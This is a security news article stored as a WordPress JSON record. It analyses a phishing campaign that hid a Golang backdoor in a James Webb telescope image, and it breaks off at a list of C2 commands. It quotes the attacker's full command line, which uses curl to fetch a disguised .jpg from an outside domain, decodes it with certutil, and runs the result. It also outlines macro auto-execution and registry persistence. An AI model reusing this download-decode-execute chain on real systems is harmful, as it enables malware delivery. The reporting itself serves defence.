{"id":19990,"date":"2022-08-31T16:10:47","date_gmt":"2022-09-01T00:10:47","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2022\/08\/31\/news-13723\/"},"modified":"2022-08-31T16:10:47","modified_gmt":"2022-09-01T00:10:47","slug":"news-13723","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/08\/31\/news-13723\/","title":{"rendered":"James Webb telescope images used to hide malware"},"content":{"rendered":"

A rather unique approach to spread malware using the popularity of the James Webb telescope images has been identified by the Securonix threat research<\/a> team.<\/p>\n

The malware is being spread by a phishing campaign that includes a Microsoft Office attachment. Similar to traditional Office macros, the template file contains a Visual Basic script that will initiate the first stage of code execution for this attack once the user enables macros. Through several steps the actual payload turns out to be a Golang binary file that acts as a backdoor.<\/p>\n

Golang<\/h2>\n

Golang or GO, which is the actual name of Golang, is an open source programming language. Some threat actors have started writing malicious code using cross-platform programming languages like Golang, Python, and Rust, with the aim of penetrating and encrypting as many systems as possible. This allows their malware to run on different combinations of operating systems and architectures.<\/p>\n

VBA Macro<\/h2>\n

In this campaign, when the document is opened, a malicious template file is downloaded and saved on the system. The template includes the functions Auto_Open<\/strong>, AutoOpen<\/strong>, and AutoExec<\/strong>. The malicious VBA macro code is set to be auto executed once macros are enabled.<\/p>\n

VBA macros should be disabled unless there are compelling reasons not to. As we explained when Microsoft disabled macros for five Office apps<\/a>, the Mark of the Web (MOTW) can be circumvented by malware authors.<\/p>\n

Certificate<\/h2>\n

The obfuscated code in the macro executes the following command:<\/p>\n

cmd.exe  \/c cd c:users{username}appdatalocal & curl http:\/\/www.xmlschemeformat.com\/update\/2021\/office\/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe<\/strong><\/p>\n

This command will download a file named OxB36F8GEEC634.jpg, use certutil.exe to decode it into a binary called msdllupdate.exe and then finally, execute that binary.<\/p>\n

But, if you open the .jpg with any of the programs that are normally associated with JPG files, you will see this image:<\/p>\n

\"oxb36f8geec634.jpg\"<\/p>\n

But, remember when we talked about steganography<\/a>? Images can be used to hide information, or an executable in this case.<\/p>\n

Obfuscation<\/h2>\n

The image contains malicious Base64 code disguised as an included certificate. Base64 is an encoding scheme designed to carry data stored in binary formats across channels that only reliably support text content. Base64 is particularly prevalent on the World Wide Web where one of its uses is the ability to embed image files or other binary assets inside textual assets such as HTML and CSS files.<\/p>\n

In the command we saw how the legitimate certutil was used to decode the so-called certificate and create a binary called msdllupdate.exe.<\/p>\n

Payload<\/h2>\n

The malware payload copies itself into %localappdata%microsoftvault<\/strong> and creates and executes a batch file in the same folder called update.bat. The .bat file creates the directory %LOCALAPPDATA%microsoftwindowsMsSafety<\/strong> and adds another copy of msdllupdate.exe<\/strong> to that folder. For this file, a startup entry is created in the registry to achieve persistence.<\/p>\n

The malware connects to a C2 server and goes into an infinite loop waiting for commands from the C2. Three commands are supported:<\/p>\n